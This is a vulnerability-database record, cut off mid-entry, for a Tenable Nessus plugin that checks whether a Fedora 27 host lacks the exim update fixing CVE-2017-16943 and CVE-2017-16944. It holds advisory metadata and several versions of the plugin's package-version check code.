{"id": "FEDORA_2017-0053BB9719.NASL", "bulletinFamily": "scanner", "title": "Fedora 27 : exim (2017-0053bb9719)", "description": "This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "published": "2018-01-15T00:00:00", "modified": "2019-12-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/105803", "reporter": "This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719"], "cvelist": ["CVE-2017-16943", "CVE-2017-16944"], "type": "nessus", "lastseen": "2019-12-13T07:04:30", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:exim"], "cvelist": ["CVE-2017-16943", "CVE-2017-16944"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 5, "enchantments": {"dependencies": {"modified": "2019-01-16T20:31:32", "references": [{"idList": ["75DD622C-D5FD-11E7-B9FE-C13EB7BCBF4F"], "type": "freebsd"}, {"idList": ["1337DAY-ID-29068", "1337DAY-ID-29082"], "type": "zdt"}, {"idList": ["USN-3499-1", "USN-3493-1"], "type": "ubuntu"}, {"idList": ["SSV:96896", "SSV:96905"], "type": "seebug"}, {"idList": ["ALAS-2017-932"], "type": "amazon"}, {"idList": ["PACKETSTORM:145152"], "type": "packetstorm"}, {"idList": ["ALA_ALAS-2017-932.NASL", "DEBIAN_DSA-4053.NASL", "EXIM_BDAT_CHUNK_UAF.NASL", "GENTOO_GLSA-201803-01.NASL", "FREEBSD_PKG_75DD622CD5FD11E7B9FEC13EB7BCBF4F.NASL", "UBUNTU_USN-3499-1.NASL", "FEDORA_2017-0032BAA7D7.NASL", "OPENSUSE-2017-1342.NASL", "UBUNTU_USN-3493-1.NASL"], "type": "nessus"}, {"idList": ["DEBIAN:DSA-4053-1:6BF76"], "type": "debian"}, {"idList": ["EDB-ID:43184"], "type": "exploitdb"}, {"idList": ["CVE-2017-16943", "CVE-2017-16944"], "type": "cve"}, {"idList": ["GLSA-201803-01"], "type": "gentoo"}, {"idList": ["OPENSUSE-SU-2017:3220-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310140539", "OPENVAS:1361412562310843388", "OPENVAS:1361412562310873919", "OPENVAS:1361412562310843380", "OPENVAS:1361412562310704053", "OPENVAS:1361412562310851658", "OPENVAS:1361412562310873907"], "type": "openvas"}, {"idList": ["THN:EE92331B07B64A7332ABABDA5C30ACC1"], "type": "thn"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "3fb38810eb51c49a78f8b02b7e863131be1b208a0b91e3a11808270356273abc", "hashmap": [{"hash": "cc82f834bb7cc4b7c64d263036c9ad35", "key": "description"}, {"hash": "1c2dca9e020487569e5aff0e7e150d79", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9534580353e4d1e80d9c9d4dd82550d2", "key": "cpe"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "3b4669c901cc98352aa667bd94356c1b", "key": "title"}, {"hash": "86f676e5b21f32f64daf43dedf620470", "key": "href"}, {"hash": "96e0ec6bed45bc10e2fcb3ed5ccabcdb", "key": "references"}, {"hash": "3fcf3472ec23d37b4712de598fcb8d16", "key": "published"}, {"hash": "140db532f722454444f5ad70cb0fb5d6", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "24746ac5a48e8a4f39b11cf8e22e39f3", "key": "pluginID"}, {"hash": "4c79fb001bf5cf57d4d013553e6d201f", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=105803", "id": "FEDORA_2017-0053BB9719.NASL", "lastseen": "2019-01-16T20:31:32", "modified": "2018-02-01T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "105803", "published": "2018-01-15T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0053bb9719.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105803);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2018/02/01 15:56:50 $\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"FEDORA\", value:\"2017-0053bb9719\");\n\n script_name(english:\"Fedora 27 : exim (2017-0053bb9719)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"exim-4.89-7.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "title": "Fedora 27 : exim (2017-0053bb9719)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 5, "lastseen": "2019-01-16T20:31:32"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:exim"], "cvelist": ["CVE-2017-16943", "CVE-2017-16944"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "enchantments": {"score": {"modified": "2018-01-16T00:58:15", "value": 7.5}}, "hash": "2ca21d4b5205dfc513862eea8d9672d36e5914db7fc049dff1c8c82c0ed208ec", "hashmap": [{"hash": "c022d6815c4b53bbbb8f6fdecc78a222", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3fcf3472ec23d37b4712de598fcb8d16", "key": "modified"}, {"hash": "9534580353e4d1e80d9c9d4dd82550d2", "key": "cpe"}, {"hash": "807b989fc0fd88b08ac40c39e09cac5e", "key": "description"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "3b4669c901cc98352aa667bd94356c1b", "key": "title"}, {"hash": "86f676e5b21f32f64daf43dedf620470", "key": "href"}, {"hash": "96e0ec6bed45bc10e2fcb3ed5ccabcdb", "key": "references"}, {"hash": "3fcf3472ec23d37b4712de598fcb8d16", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "24746ac5a48e8a4f39b11cf8e22e39f3", "key": "pluginID"}, {"hash": "4c79fb001bf5cf57d4d013553e6d201f", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=105803", "id": "FEDORA_2017-0053BB9719.NASL", "lastseen": "2018-01-16T00:58:15", "modified": "2018-01-15T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "105803", "published": "2018-01-15T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0053bb9719.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105803);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2018/01/15 14:56:00 $\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"FEDORA\", value:\"2017-0053bb9719\");\n\n script_name(english:\"Fedora 27 : exim (2017-0053bb9719)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"exim-4.89-7.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "title": "Fedora 27 : exim (2017-0053bb9719)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2018-01-16T00:58:15"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:exim"], "cvelist": ["CVE-2017-16943", "CVE-2017-16944"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 7, "enchantments": {"dependencies": {"modified": "2019-10-28T20:11:58", "references": [{"idList": ["75DD622C-D5FD-11E7-B9FE-C13EB7BCBF4F"], "type": "freebsd"}, {"idList": ["1337DAY-ID-29068", "1337DAY-ID-29082"], "type": "zdt"}, {"idList": ["USN-3499-1", "USN-3493-1"], "type": "ubuntu"}, {"idList": ["SSV:96896", "SSV:96905"], "type": "seebug"}, {"idList": ["ALAS-2017-932"], "type": "amazon"}, {"idList": ["PACKETSTORM:145152"], "type": "packetstorm"}, {"idList": ["ALA_ALAS-2017-932.NASL", "DEBIAN_DSA-4053.NASL", "EXIM_BDAT_CHUNK_UAF.NASL", "GENTOO_GLSA-201803-01.NASL", "FREEBSD_PKG_75DD622CD5FD11E7B9FEC13EB7BCBF4F.NASL", "UBUNTU_USN-3499-1.NASL", "FEDORA_2017-0032BAA7D7.NASL", "OPENSUSE-2017-1342.NASL", "UBUNTU_USN-3493-1.NASL"], "type": "nessus"}, {"idList": ["DEBIAN:DSA-4053-1:6BF76"], "type": "debian"}, {"idList": ["EDB-ID:43184"], "type": "exploitdb"}, {"idList": ["CVE-2017-16943", "CVE-2017-16944"], "type": "cve"}, {"idList": ["GLSA-201803-01"], "type": "gentoo"}, {"idList": ["OPENSUSE-SU-2017:3220-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310140539", "OPENVAS:1361412562310843388", "OPENVAS:1361412562310873919", "OPENVAS:1361412562310843380", "OPENVAS:1361412562310704053", "OPENVAS:1361412562310851658", "OPENVAS:1361412562310873907"], "type": "openvas"}, {"idList": ["THN:EE92331B07B64A7332ABABDA5C30ACC1"], "type": "thn"}]}, "score": {"modified": "2019-10-28T20:11:58", "value": 7.6, "vector": "NONE"}}, "hash": "c12cae71e5ae68514aca98f97bd347e9cb2a5683e530795e0013c5036d758121", "hashmap": [{"hash": "5b0aef06cc449031985b7ee781024ce7", "key": "sourceData"}, {"hash": "cc82f834bb7cc4b7c64d263036c9ad35", "key": "description"}, {"hash": "9534580353e4d1e80d9c9d4dd82550d2", "key": "cpe"}, {"hash": "3b4669c901cc98352aa667bd94356c1b", "key": "title"}, {"hash": "96e0ec6bed45bc10e2fcb3ed5ccabcdb", "key": "references"}, {"hash": "3fcf3472ec23d37b4712de598fcb8d16", "key": "published"}, {"hash": "0975adf19adb993cc2dc44ea6b27d31e", "key": "reporter"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "24746ac5a48e8a4f39b11cf8e22e39f3", "key": "pluginID"}, {"hash": "485c41a48047d23b0282ee19ec1cc5f9", "key": "href"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "4c79fb001bf5cf57d4d013553e6d201f", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/105803", "id": "FEDORA_2017-0053BB9719.NASL", "lastseen": "2019-10-28T20:11:58", "modified": "2019-10-02T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "105803", "published": "2018-01-15T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719"], "reporter": "This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0053bb9719.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105803);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/24 14:09:05\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"FEDORA\", value:\"2017-0053bb9719\");\n\n script_name(english:\"Fedora 27 : exim (2017-0053bb9719)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"exim-4.89-7.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "title": "Fedora 27 : exim (2017-0053bb9719)", "type": "nessus", "viewCount": 3}, "differentElements": ["modified"], "edition": 7, "lastseen": "2019-10-28T20:11:58"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:exim"], "cvelist": ["CVE-2017-16943", "CVE-2017-16944"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "d4b56ebcbf447c66c5ecca5e179b5722c0f6c6ef0e2175c1d80a9d551ddd1fdf", "hashmap": [{"hash": "1c2dca9e020487569e5aff0e7e150d79", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9534580353e4d1e80d9c9d4dd82550d2", "key": "cpe"}, {"hash": "807b989fc0fd88b08ac40c39e09cac5e", "key": "description"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "3b4669c901cc98352aa667bd94356c1b", "key": "title"}, {"hash": "86f676e5b21f32f64daf43dedf620470", "key": "href"}, {"hash": "96e0ec6bed45bc10e2fcb3ed5ccabcdb", "key": "references"}, {"hash": "3fcf3472ec23d37b4712de598fcb8d16", "key": "published"}, {"hash": "140db532f722454444f5ad70cb0fb5d6", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "24746ac5a48e8a4f39b11cf8e22e39f3", "key": "pluginID"}, {"hash": "4c79fb001bf5cf57d4d013553e6d201f", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=105803", "id": "FEDORA_2017-0053BB9719.NASL", "lastseen": "2018-09-01T23:41:01", "modified": "2018-02-01T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "105803", "published": "2018-01-15T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0053bb9719.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105803);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2018/02/01 15:56:50 $\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"FEDORA\", value:\"2017-0053bb9719\");\n\n script_name(english:\"Fedora 27 : exim (2017-0053bb9719)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"exim-4.89-7.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "title": "Fedora 27 